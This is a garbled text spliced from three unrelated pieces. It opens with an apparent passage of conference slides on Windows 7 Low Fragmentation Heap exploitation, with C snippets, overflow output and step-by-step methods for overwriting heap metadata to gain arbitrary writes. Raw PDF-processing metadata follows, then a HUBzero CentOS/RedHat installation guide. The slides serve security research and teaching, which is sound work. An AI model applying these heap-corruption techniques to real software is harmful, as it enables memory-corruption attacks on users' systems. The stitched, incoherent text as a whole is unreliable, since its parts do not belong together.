// if we unlinked from a dedicated free list and emptied it, clear the bitmap
if (reqsize < 0x80 && nextchunk == prevchunk)
{
    size = SIZE(chunk);
    BitMask = 1 << (size & 7);
    // note that this is an xor
    FreeListsInUseBitmap[size >> 3] ^= BitMask;
}

// Heap Alloc
size = SIZE(chunk);
BitMask = 1 << (size & 0x1F);
BlocksIndex->ListsInUseUlong[size >> 5] &= ~BitMask;

// Heap Free
size = SIZE(chunk);
BitMask = 1 << (size & 0x1F);
BlocksIndex->ListsInUseUlong[size >> 5] |= BitMask;
```

Security Mechanisms : Safe Linking

```c
if (InsertList->Blink->Flink == InsertList)
{
    ChunkToFree->Flink = InsertList;
    ChunkToFree->Blink = InsertList->Blink;
    InsertList->Blink->Flink = ChunkToFree;
    InsertList->Blink = ChunkToFree;
}
else
{
    RtlpLogHeapFailure();
}

if (BlocksIndex)
{
    FreeListIndex = BlocksIndexSearch(BlocksIndex, ChunkSize);
    _LIST_ENTRY *FreeListToUse = BlocksIndex->ListHints[FreeListIndex];

    //ChunkToFree.Flink/Blink are user controlled
    if (ChunkSize >= FreeListToUse->Size)
    {
        BlocksIndex->ListHints[FreeListIndex] = ChunkToFree;
    }
}
```

- **Information**
  - Prevents overwriting a FreeList->Blink, which when linking a chunk in could be made to point at the chunk that was inserted before it
  - Brett Moore, Attacking FreeList[0]
- **Thoughts**
Although it prevents insertion attacks, if it doesn't terminate, the chunk will be placed in one of the **ListHints**
  - The problem is the Flink/Blink are fully controlled due to no **Linking** process
  - You still have to deal with **Safe Unlinking**, but it's a starting point.

Tactics

"You do not want to pray-after-free – Nico Waisman"

Tactics : Heap Determinism : Activating the LFH

• 0x12 (18) consecutive allocations will guarantee the LFH is enabled for SIZE
• 0x11 (17) if the _LFH_HEAP has been previously activated

```c
//Without the LFH activated
//0x10 => Heap->CompatibilityFlags |= 0x20000000;
//0x11 => RtlpPerformHeapMaintenance(Heap);
//0x11 => FreeList->Blink = LFHContext + 1;
for (i = 0; i < 0x12; i++)
    HeapAlloc(pHeap, 0x0, SIZE);
```

Tactics : Heap Determinism : Defragmentation

[Figure: Gray = BUSY, Blue = FREE. A game of filling the holes.]

Easily done by making enough allocations to create a new **SubSegment** with an associated **UserBlock**.

```c
EnableLFH(SIZE);
NormalizeLFH(SIZE);

alloc1 = HeapAlloc(pHeap, 0x0, SIZE);
alloc2 = HeapAlloc(pHeap, 0x0, SIZE);
memset(alloc2, 0x42, SIZE);
*(alloc2 + SIZE-1) = '\0';
alloc3 = HeapAlloc(pHeap, 0x0, SIZE);
memset(alloc3, 0x43, SIZE);
*(alloc3 + SIZE-1) = '\0';

printf("alloc2 => %s\n", alloc2);
printf("alloc3 => %s\n", alloc3);

memset(alloc1, 0x41, SIZE * 3);

printf("Post overflow..\n");
printf("alloc2 => %s\n", alloc2);
printf("alloc3 => %s\n", alloc3);
```

Result:

alloc2 => BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
alloc3 => CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
Post overflow..
alloc2 => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCC
alloc3 => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCC

```c
alloc1 = HeapAlloc(pHeap, 0x0, SIZE);
alloc2 = HeapAlloc(pHeap, 0x0, SIZE);
alloc3 = HeapAlloc(pHeap, 0x0, SIZE);

HeapFree(pHeap, 0x0, alloc2);

//an overflow-able chunk just like alloc1 could reside in the same position as alloc2
alloc4 = HeapAlloc(pHeap, 0x0, SIZE);
memcpy(alloc4, src, SIZE);
```

• Overwrite into adjacent chunks (requires normalization)
• Can overwrite the NULL terminator (Vreugdenhil 2010)
• Ability to use data in a recently freed chunk with proper heap manipulation

Tactics : Heap Determinism : Data Seeding

```c
EnableLFH(SIZE);
NormalizeLFH(SIZE);

for(i = 0; i < 0x4; i++)
{
    allocb[i] = HeapAlloc(pHeap, 0x0, SIZE);
    memset(allocb[i], 0x41 + i, SIZE);
}

printf("Freeing all chunks!\n");
for(i = 0; i < 0x4; i++)
{
    HeapFree(pHeap, 0x0, allocb[i]);
}

printf("Allocating again\n");
for(i = 0; i < 0x4; i++)
{
    allocb[i] = HeapAlloc(pHeap, 0x0, SIZE);
}
```

Result:

Allocation 0x00 for 0x28 bytes => 41414141 41414141 41414141
Allocation 0x01 for 0x28 bytes => 42424242 42424242 42424242
Allocation 0x02 for 0x28 bytes => 43434343 43434343 43434343
Allocation 0x03 for 0x28 bytes => 44444444 44444444 44444444
Freeing all chunks!
Allocating again
Allocation 0x00 for 0x28 bytes => 0E004444 44444444 44444444
Allocation 0x01 for 0x28 bytes => 08004343 43434343 43434343
Allocation 0x02 for 0x28 bytes => 02004242 42424242 42424242
Allocation 0x03 for 0x28 bytes => 62004141 41414141 41414141

• The saved FreeEntryOffset resides in the 1st 2 bytes
• Influence the LSB of a vtable
• Good for use-after-free
• See Nico Waisman's 2010 BH Presentation / Paper
• NICO Rules!

Tactics : Exploitation

"For the Buristicati, By the Buristicati"

RtlpLowFragHeapFree() will adjust the _HEAP_ENTRY if certain flags are set.
```c
_HEAP_ENTRY *ChunkHeader = ChunkToFree - sizeof(_HEAP_ENTRY);

if (ChunkHeader->UnusedBytes == 0x5)
    ChunkHeader -= 8 * (BYTE)ChunkHeader->SegmentOffset;
```

_HEAP_ENTRY layout (byte offsets):

| 0x0 | 0x2 | 0x3 | 0x4 | 0x6 | 0x7 |
|-----|-----|-----|-----|-----|-----|
| Size | Flags | Checksum | Prev Size | Seg Offset | UnusedBytes |

If you can overflow into a chunk that will be freed, the `SegmentOffset` can be used to point to another valid _HEAP_ENTRY. This could lead to controlling data that was previously allocated (think C++ objects).

**Prerequisites**
- Ability to allocate SIZE
- Place a legitimate chunk before the chunk to be overflowed
- Overflow at least 8-bytes
- Ability to free the overwritten chunk

**Methodology**
1. Enable LFH
2. Normalize LFH
3. Alloc1
4. Alloc2
5. Overwrite Alloc2's header to point to an object of interest
6. Free Alloc2
7. Alloc3 (will point to the object of interest)
8. Write data

Tactics : Exploitation : FreeEntryOffset Overwrite: Part I

All code in RtlpLowFragHeapAllocFromContext() is wrapped in try/catch{}. All exceptions will return 0, letting the back-end handle the allocation.

```c
try
{
    // the next offset is stored in the 1st 2-bytes of userdata
    short NextOffset = *(short *)(UserBlocks + BlockOffset + sizeof(_HEAP_ENTRY));

    _INTERLOCK_SEQ AggrExchg_New;
    AggrExchg_New.FreeEntryOffset = NextOffset;
}
catch
{
    return 0;
}
```

As we saw, the FreeEntryOffset is stored in the 1st 2 bytes of user-writeable data within each chunk in a UserBlock. This will be used to get the address of the next free chunk used for allocation. What if we overflow this chunk?

Assume a **full** UserBlock for 0x30 bytes (0x6 blocks). Our first allocation will update the **FreeEntryOffset** to **0x0008**.
(Stored in _INTERLOCK_SEQ.FreeEntryOffset)

Memory Pages

- +0x02: NextOffset = 0x0008
- +0x08: NextOffset = 0x000E
- +0x0E: NextOffset = 0x0014
- +0x14: NextOffset = 0x001A
- ...
- Last Entry: NextOffset = 0xFFFF
- FreeEntryOffset = 0x0002

If an overflow of at least 0x9 bytes (0xA preferable) is made, the saved FreeEntryOffset of the adjacent chunk can be overwritten. This gives the attacker a range of 0xFFFF * 0x8 (offsets are stored in blocks and converted to byte offsets).

An allocation for the overwritten block must be made next to store the tainted offset in the _INTERLOCK_SEQ. In this example, we will have a 0x1501 * 0x8 jump to the next 'free chunk'.

Tactics : Exploitation : FreeEntryOffset Overwrite: Part V

Since it's possible to get SubSegments adjacent to each other in memory, you can write into other forwardly adjacent memory pages (control over allocations is required). This gives you the ability to overwrite data that is in a different _HEAP_SUBSEGMENT than the one which you are overflowing.
Memory Pages

UserBlock @ 0x5157800 for Size 0x30
- +0x0E: NextOffset = 0x0014
- +0x14: NextOffset = 0x001A
- ...
- FreeEntryOffset = 0x1501 (overwritten)

UserBlock @ 0x5162000 for Size 0x40
- +0x02: NextOffset = 0x000A
- +0x0A: NextOffset = 0x0012
- +0x12: NextOffset = 0x001A
- +0x1A: NextOffset = 0x0022
- ...
- FreeEntryOffset = 0x0002

Prerequisites
- Enable the LFH
- Normalize the heap
- Control allocations for SIZE
- 0x9 – 0xA byte overflow into an adjacent chunk
- Adjacent chunk must be FREE
- Object to overwrite within range (0xFFFF * 0x8 = max)

Methodology
1. Enable LFH
2. Normalize LFH
3. Alloc1
4. Overwrite into the free chunk from Alloc1
5. Alloc2 (contains the overwritten header)
6. Alloc3 (uses the overwritten FreeEntryOffset)
7. Write data to Alloc3 (which will be an object of your choosing w/in 0xFFFF * 0x8)

NextChunk = UserBlock + Depth_IntoUserBlock + (FreeEntryOffset * 8)
NextChunk = 0x5157800 + 0x0E + (0x1501 * 8)
NextChunk = 0x5162016

Tactics : Exploitation : Observation

"Strawberry Pudding? Psst, this is a five course meal."

If the SubSegment can not be used, the LFH will create a new **UserBlock** and assign it to a new **SubSegment**. **RtlpLowFragHeapAllocateFromZone** will create space for new SubSegments if they have all been exhausted. This provides a memory layout where the UserBlock data resides before the _LFH_BLOCK_ZONE structures (which hold pointers used for SubSegment initialization).

Tactics : Exploitation : SubSegment Overwrite: Part III

An overflow past the end of the UserBlock will result in the overwriting of SubSegment information. The item of most concern is the pointer to the UserBlocks structure inside the SubSegment.
If this value can be overwritten, then a subsequent allocation will result in an n-byte write to a user-supplied address.

Tactics : Exploitation : SubSegment Overwrite: Part IV

```c
if(!Depth || !UserBlocks || SubSeg->LocalInfo != HeapLocalSegmentInfo)
{
    break;
}
```

**Issues**

1. The **UserBlock** that can be overflowed MUST reside before the space allocated for the _HEAP_SUBSEGMENT. This is not trivial, due to most applications not having a deterministic **BlockZone->Limit**. You won't know how many pointers are left.
2. **SubSeg->LocalInfo != HeapLocalSegmentInfo**. The address of the _HEAP_LOCAL_SEGMENT_INFO structure for a specific Bucket is required. The easiest way to determine this value would be a leak of the _LFH_HEAP pointer. (There are probably other ways as well.)
3. A guard page could mitigate the effects of an overflow into an adjacent SubSegment.

Conclusion

"I know that most of the audience will be fast asleep by now."

Conclusion

• Data structures have become far more complex
• Dedicated FreeLists / Lookaside Lists are dead
• Replaced with the new FreeList structure and the LFH
• Many security mechanisms added since Win XP SP2
• Meta-data corruption now leveraged to overwrite application data
• Heap normalization more important than ever
• Much more work to be done…

What's next?

• Developing reliable exploits specifically for Win7
• Abusing un-encoded header information
• Look at Virtual / Debug allocation/free routines
• Caching mechanisms
• Continuing to come up with heap manipulation techniques
• Figuring out information leaks (heap addresses)
• HeapCON?

Thanks to all the BISTICATI for their help!
- Jon Larimer - Ryan Smith - Nico Waisman - Ben Hawkes - Matt Miller - Alex Sotirov - Dino Dai Zovi - Mark Dowd - John McDonald - @jmpesp - Matthieu Suiche

Demo

"Fin."
[26735, 29817, null], [29817, 29990, null], [29990, 33528, null], [33528, 36921, null], [36921, 39722, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3456, true], [3456, 7844, null], [7844, 11983, null], [11983, 15195, null], [15195, 19017, null], [19017, 22593, null], [22593, 26735, null], [26735, 29817, null], [29817, 29990, null], [29990, 33528, null], [33528, 36921, null], [36921, 39722, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39722, null]], "pdf_page_numbers": [[0, 3456, 1], [3456, 7844, 2], [7844, 11983, 3], [11983, 15195, 4], [15195, 19017, 5], [19017, 22593, 6], [22593, 26735, 7], [26735, 29817, 8], [29817, 29990, 9], [29990, 33528, 10], [33528, 36921, 11], [36921, 39722, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39722, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
22af3fbb8aae809941269aa78ef159f4157fcacd
[REMOVED]
{"Source-Url": "http://einarj.at.ifi.uio.no/Papers/din17tableaux.pdf", "len_cl100k_base": 15905, "olmocr-version": "0.1.50", "pdf-total-pages": 21, "total-fallback-pages": 0, "total-input-tokens": 85846, "total-output-tokens": 18791, "length": "2e13", "weborganizer": {"__label__adult": 0.0003218650817871094, "__label__art_design": 0.00033402442932128906, "__label__crime_law": 0.00029587745666503906, "__label__education_jobs": 0.0006527900695800781, "__label__entertainment": 5.728006362915039e-05, "__label__fashion_beauty": 0.00012814998626708984, "__label__finance_business": 0.0002193450927734375, "__label__food_dining": 0.00032639503479003906, "__label__games": 0.0006237030029296875, "__label__hardware": 0.000637054443359375, "__label__health": 0.0003590583801269531, "__label__history": 0.00023603439331054688, "__label__home_hobbies": 8.511543273925781e-05, "__label__industrial": 0.00041747093200683594, "__label__literature": 0.000293731689453125, "__label__politics": 0.00026679039001464844, "__label__religion": 0.0004763603210449219, "__label__science_tech": 0.0157470703125, "__label__social_life": 6.753206253051758e-05, "__label__software": 0.004619598388671875, "__label__software_dev": 0.97265625, "__label__sports_fitness": 0.0002522468566894531, "__label__transportation": 0.0006260871887207031, "__label__travel": 0.00019991397857666016}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 65598, 0.01242]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 65598, 0.45664]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 65598, 0.84817]], "google_gemma-3-12b-it_contains_pii": [[0, 2520, false], [2520, 5811, null], [5811, 8154, null], [8154, 9793, null], [9793, 12865, null], [12865, 16849, null], [16849, 20324, null], [20324, 23967, null], [23967, 27437, null], [27437, 31548, null], [31548, 35498, null], [35498, 36782, null], [36782, 
40253, null], [40253, 43868, null], [43868, 46610, null], [46610, 50067, null], [50067, 52336, null], [52336, 55893, null], [55893, 59457, null], [59457, 62289, null], [62289, 65598, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2520, true], [2520, 5811, null], [5811, 8154, null], [8154, 9793, null], [9793, 12865, null], [12865, 16849, null], [16849, 20324, null], [20324, 23967, null], [23967, 27437, null], [27437, 31548, null], [31548, 35498, null], [35498, 36782, null], [36782, 40253, null], [40253, 43868, null], [43868, 46610, null], [46610, 50067, null], [50067, 52336, null], [52336, 55893, null], [55893, 59457, null], [59457, 62289, null], [62289, 65598, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 65598, null]], "pdf_page_numbers": [[0, 2520, 1], [2520, 5811, 2], [5811, 8154, 3], [8154, 9793, 4], [9793, 12865, 5], [12865, 16849, 6], [16849, 20324, 7], [20324, 23967, 8], [23967, 27437, 9], [27437, 31548, 10], [31548, 35498, 11], [35498, 36782, 12], [36782, 40253, 13], [40253, 43868, 14], [43868, 46610, 15], [46610, 50067, 16], [50067, 52336, 17], [52336, 55893, 18], [55893, 59457, 19], [59457, 62289, 20], [62289, 65598, 
21]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 65598, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
3bfd7a0d0b5171f6b1748754307943825e115b1a
# Installation

## Target Audience

This document, and the installation and maintenance of a HUBzero system, is aimed at experienced Linux administrators (preferably experienced with RedHat or CentOS distributions).

## Minimum System Requirements

HUBzero (RedHat) installations require one or more dedicated hosts running RedHat or CentOS version 7. A typical starter HUBzero installation might consist of a single physical server with dual 64-bit quad-core CPUs, 24 Gigabytes of RAM, and a terabyte of disk. Production systems should try not to limit hardware resources; HUBzero is designed to run on systems with many CPU cores and lots of RAM. If you are looking for a system to run a small site with limited physical or virtual resources, this is probably not the system for you. However, for demonstration or development purposes we often create VM images with less than a gigabyte of RAM and 5 gigabytes of disk. While fully functional, these virtual machines would only be suitable for a single user doing development or testing.

## System Architecture

All hardware, filesystem partitions, RAID configurations, backup models, security models, etc., and base configurations of the host's email server, SSH server, network, etc., are the responsibility of the system administrator managing the host. The Hubzero software expects to be installed on a headless server from a minimal ISO with only one network interface (required by OpenVZ) with an MTU of no less than 1500. System accounts must not be created with an id of 1000 or greater - more about that in a forthcoming section.

## Linux Install

### Basic Operating System

Advanced Linux system administrator skills are required, so please read carefully. Selecting all the default configurations during the operating system installation may not always be suitable. The latest version of RedHat Enterprise Linux 7 or CentOS 7 (x86_64 is the only architecture supported) should be downloaded and installed.
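Before going further, you can sanity-check the host against the sizing suggested above. A minimal sketch; the 8-core/24 GB thresholds mirror the starter sizing described earlier and are illustrative only:

```shell
# Compare the host against the suggested starter sizing.
# Thresholds are illustrative, not hard requirements.
cores=$(nproc)
mem_gb=$(awk '/MemTotal/ {printf "%d", $2 / 1024 / 1024}' /proc/meminfo)
echo "cores=${cores} mem_gb=${mem_gb}"
[ "$cores" -ge 8 ]   || echo "WARNING: fewer than 8 CPU cores"
[ "$mem_gb" -ge 24 ] || echo "WARNING: less than 24 GB RAM"
```

A smaller host will still work for development or demonstration, as noted above.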
Do not install a default LAMP environment or other server packages. System reboots are required to complete the installation. Be sure to remove the install disk or otherwise reset your server's boot media before rebooting. The precise server configuration (such as disk partitioning, networking, etc.) depends on how the hub is to be used and on what hardware is available, so not all possible configuration options are outlined here. This installation guide outlines a very basic configuration that may not be suitable for larger sites. For larger sites, it is generally expected that the hub will be managed by an experienced Linux administrator who can help set up your site to meet your specific requirements. The following instructions cover only how to install the Hubzero software. At a minimum, a "Basic Server" host with network access, ideally installed from a 'minimal' ISO image, is required. The Hubzero software expects to be installed on a headless server without a Graphical User Interface.

## Configure Networking and DNS

Configure your host's network as desired. A registered domain name and an SSL certificate are required and should be obtained prior to installation. A static IP address is highly recommended as well.

By default, the Hubzero middleware uses IP addresses in the 192.168.0.0/16 subnet. Do not use an IP address in this range for your host.

## Set hostname

Throughout this documentation you will see specific instructions for running commands, with part of the text highlighted. The highlighted text should be modified to match your local configuration choices (e.g. replace "example.com" with the fully qualified hostname of your machine).

HUBzero expects the `hostname` command to return the fully qualified hostname for the system.
This step may be skipped if previously configured.

```
sudo hostname hubdomain.org
```

Make the change permanent:

```
sudo hostnamectl set-hostname hubdomain.org
```

## Delete local Users

HUBzero reserves all user ids from 1000 up for hub accounts. As part of the app middleware, every account must map to a corresponding system account. Therefore, when starting up a hub it is required to remove all accounts that have user ids of 1000 or greater. New RedHat/CentOS installations typically do not set up a non-root account during setup, but if you have added any accounts to the system, those accounts can be removed as follows:

```
sudo userdel username
sudo rm -fr /home/username
```

If you require additional system accounts, they should use user and group ids in the range of 500-999 (these will not interfere with hub operations).

## Update the initial OS install

```
sudo yum update -y
```

## Disable SELinux

Hubzero does not currently support SELinux. Since the default install of RHEL turns it on, we have to turn it off.
```
sudo sed -i 's/^SELINUX=.*/SELINUX=disabled/g' /etc/selinux/config
```

Reboot the system for this change to take effect:

```
sudo reboot
```

## Yum repository setup

Install the hubzero repository configuration package.

For RedHat Enterprise Linux 7:

```bash
sudo subscription-manager repos --enable rhel-7-server-optional-rpms
sudo subscription-manager repos --enable rhel-7-server-extras-rpms
sudo subscription-manager repos --enable rhel-server-rhscl-7-rpms
sudo rpm -Uvh http://packages.hubzero.org/rpm/julian-el7/hubzero-release-julian-2.2.7-1.el7.noarch.rpm
```

For CentOS 7:

```bash
sudo yum install -y epel-release
sudo yum install -y centos-release-scl-rh
sudo rpm -Uvh http://packages.hubzero.org/rpm/julian-el7/hubzero-release-julian-2.2.7-1.el7.noarch.rpm
```

## Firewall

Install:

```
sudo yum remove -y firewalld
sudo yum install -y hubzero-iptables-basic
sudo service hubzero-iptables-basic start
sudo chkconfig hubzero-iptables-basic on
```

If installing the Hubzero tool infrastructure:

```
sudo yum install -y hubzero-mw2-iptables-basic
sudo service hubzero-mw2-iptables-basic start
sudo chkconfig hubzero-mw2-iptables-basic on
```

HUBzero requires the use of iptables to route network connections between application sessions and the external network. The scripts controlling this can also be used to manage basic firewall operations for the site. The basic scripts installed here block all access to the host except for those ports required by HUBzero (http, https, http-alt, ldap, ssh, smtp, mysql, submit, etc.).

## Web Server

Install the Apache Httpd web server:

```bash
sudo yum install -y hubzero-apache2
sudo service httpd start
sudo chkconfig httpd on
```

## PHP

HUBzero still requires the use of PHP 5.6 (7.x support coming soon). For CentOS/RedHat 7 you used to be able to get 5.6 via the software collections library; when that was removed, we mirrored a copy. Those packages are no longer being maintained and are not recommended.
The current recommendation for RedHat/CentOS 7 is to use the php56 packages from the Remi Repository ([https://rpms.remirepo.net](https://rpms.remirepo.net)). These packages are still receiving security updates for serious issues despite PHP 5.6 having reached upstream EOL.

```
sudo rpm -Uvh https://rpms.remirepo.net/enterprise/remi-release-7.rpm
sudo yum install -y hubzero-php56-remi
sudo service php56-php-fpm start
sudo chkconfig php56-php-fpm on
```

## Database

### MySQL Database Installation

HUBzero should work with any MySQL 5.5 compatible database. We have used MySQL 5.5.x and 5.6.x, MariaDB 5.5.x, 10.1.x, and 10.3.x, and Percona XtraDB Cluster 5.7.x. For CentOS 7 and RedHat Enterprise 7 we recommend MariaDB 5.5.x directly from the MariaDB rpm repositories, as they are maintaining longer term support (https://downloads.mariadb.org/mariadb/repositories).

### CentOS 7 - MariaDB Database Installation

Note that `sudo` does not apply to shell redirection, so write the repository file via `sudo tee`:

```
sudo tee /etc/yum.repos.d/mariadb-5.5.repo << EOF
# MariaDB 5.5 CentOS repository list
# http://downloads.mariadb.org/mariadb/repositories/
[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/5.5/centos7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1
EOF

sudo yum install -y MariaDB-server
sudo service mysql start
sudo chkconfig mysql on
```

### RedHat Enterprise Linux 7 - MariaDB Database Installation

```
sudo tee /etc/yum.repos.d/mariadb-5.5.repo << EOF
# MariaDB 5.5 RedHat repository list
# http://downloads.mariadb.org/mariadb/repositories/
[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/5.5/rhel7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1
EOF

sudo yum install -y MariaDB-server
sudo service mysql start
sudo chkconfig mysql on
```

### Configure

The default configuration works well for starters. For optimal performance, however, you will need a database administrator capable of tuning your database to your hardware configuration and site usage.
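After writing the repository definition, it is worth verifying the settings that matter before running yum. A minimal sketch; it writes to a temporary path purely for illustration, whereas a real install targets `/etc/yum.repos.d/mariadb-5.5.repo`:

```shell
# Write the repository definition to a temporary path for illustration,
# then verify that GPG checking is enabled and a baseurl is present.
repo=$(mktemp)
tee "$repo" > /dev/null << 'EOF'
[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/5.5/centos7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1
EOF
grep -q '^gpgcheck=1' "$repo" && grep -q '^baseurl' "$repo" \
  && echo "repo file OK"
rm -f "$repo"
```

The same two `grep` checks can be pointed at the real file under `/etc/yum.repos.d/` once it is in place.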
## Mail

Install Postfix:

```bash
sudo yum install -y postfix
sudo service postfix start
sudo chkconfig postfix on
```

Test:

```bash
sudo postfix check
```

If the 'postfix check' command returns anything, resolve the reported issues with the Postfix installation before continuing.

### Configure Postfix

Configure Postfix as desired. The default installation may only handle mail on the localhost. HUBzero expects to be able to send mail to registered users' email addresses to confirm registration, and also to send group and support-ticket related messages. Incoming mail is also expected to work (see the Mailgateway section) in order to receive support ticket updates and email replies to group forum messages. Setting up an appropriate mail configuration is up to the site administrator. The Mailgateway service expects Postfix to be the Mail Transfer Agent on CentOS and RedHat systems.

## CMS

Installation:

```
sudo yum install -y hubzero-cms-2.2
sudo yum install -y hubzero-texvc
sudo yum install -y hubzero-textifier
sudo yum install -y wkhtmltopdf
```

Configuration:

```
sudo hzcms install hubname
```

It is necessary to immediately run the updater to apply fixes that have not been incorporated into the initial installation:

```
sudo hzcms update
```

## SSL Configuration

The default SSL certificate is a self-signed certificate (aka "snakeoil") meant for evaluation purposes only. Some browsers will not accept this certificate and will not allow access to the site without special configuration (https://support.mozilla.org/en-US/questions/1012036). For a production hub you will need to obtain a valid SSL certificate. A certificate may contain two or three pieces: a public certificate, a private key, and sometimes an intermediate certificate. All files are expected to be in PEM format.

Let's Encrypt and Certbot may be a viable option to obtain SSL certificates - https://certbot.eff.org/lets-encrypt/centosrhel7-apache.html **Do NOT use Snap.**
Instead, run `yum install -y certbot python-certbot-apache`, then follow the rest of the instructions to run the 'certbot' commands - start with step #7, 'just get a certificate': `certbot certonly --apache`.

Once you obtain the certificate, copy the SSL certificate files to the httpd SSL configuration directories and restart httpd:

```
sudo cp [your certificate pem file] /etc/httpd/conf/ssl.crt/hubname-cert.pem
sudo cp [your certificate private key pem file] /etc/httpd/conf/ssl.key/hubname-privkey.pem
sudo cp [your certificate intermediate certificate chain pem file] /etc/httpd/conf/ssl.crt/hubname-chain.pem

sudo chown root:root /etc/httpd/conf/ssl.crt/hubname-cert.pem
sudo chown root:root /etc/httpd/conf/ssl.key/hubname-privkey.pem
sudo chown root:root /etc/httpd/conf/ssl.crt/hubname-chain.pem

sudo chmod 0640 /etc/httpd/conf/ssl.crt/hubname-cert.pem
sudo chmod 0640 /etc/httpd/conf/ssl.key/hubname-privkey.pem
sudo chmod 0640 /etc/httpd/conf/ssl.crt/hubname-chain.pem

sudo hzcms reconfigure hubname
sudo service httpd restart
```

If you are using the HTML5 VNC Proxy Server, you must update your certificate settings there as well.

## First Hub Account Creation

You should now be able to create a new user account for yourself via hub web registration at "/register". Depending on your email hosting, you may not receive the confirmation email. After your new user account is created, you can confirm, approve, and promote the new account as the installing admin by logging into /administrator with the admin account credentials. The 'admin' user password is stored in /etc/hubzero.secrets and can only be read by the root user. The admin account should be used only once, to approve and promote your individual user account, and should be disabled in the CMS afterwards.
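After copying the certificate files in the SSL step above, a quick check that the file mode came out as intended can save a confusing httpd failure later. A minimal sketch using GNU `stat`; it operates on a temporary file for illustration, whereas a real check would target the `hubname-*.pem` files under `/etc/httpd/conf/`:

```shell
# Illustrative permission check on a temporary file; on a real hub,
# point this at /etc/httpd/conf/ssl.key/hubname-privkey.pem etc.
f=$(mktemp)
chmod 0640 "$f"
mode=$(stat -c '%a' "$f")   # GNU coreutils stat: octal mode
echo "mode=${mode}"
[ "$mode" = "640" ] && echo "permissions OK"
rm -f "$f"
```

The same `stat -c '%a'` check works for any of the three PEM files installed above.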
## SOLR Search

Install:

```
sudo yum install -y hubzero-solr
```

## Mailgateway

Install the Hubzero Mailgateway:

```bash
sudo yum install -y hubzero-mailgateway
```

Configure the Hubzero Mailgateway:

```bash
sudo hzcms configure mailgateway --enable
```

## Submit

### Introduction

The submit command provides a means for HUB end users to execute applications on remote resources. The end user is not required to have knowledge of remote job submission mechanics. Jobs can be submitted to traditional queued batch systems, including PBS and Condor, or executed directly on remote resources.

### Installation

```bash
sudo yum install -y hubzero-submit-pegasus
sudo yum install -y hubzero-submit-condor
sudo yum install -y hubzero-submit-common
sudo yum install -y hubzero-submit-server
sudo yum install -y hubzero-submit-distributor
sudo yum install -y hubzero-submit-monitors
sudo hzcms configure submit-server --enable
sudo service submit-server start
sudo chkconfig submit-server on
```

At completion of the yum install commands, several files will be located in the directory `/opt/submit`. Excluding compiled Python files, the directory listing should look like the following:

```
$ ls -a -I "*.pyc" -I "." -I ".."
.ssh           distributor.sh            monitorJob.py     monitorTunnelA.py  server.py
BatchMonitors  environmentWhitelist.dat  monitorJobDB      monitorTunnelD.py  sites.dat
Scripts        environmentWhitelist.dft  monitorJobQ.py    monitorTunnelI.py  sites.dft
bin            etc                       monitorJobR.py    monitorTunnelR.py  tools.dat
config         managers.dat              monitorJobS.py    monitorTunnelT.py  tools.dft
distributor    managers.dft              monitorJobT.py    monitors.dat       tunnels.dat
distributor.py monitorJob.dump           monitorTunnel.py  monitors.dft       tunnels.dft
```

### Configuration

Submit provides a mechanism to execute jobs on machines outside the HUB domain. To accomplish this feat, some configuration is required on the HUB and some additional software must be installed and configured on hosts in remote domains.
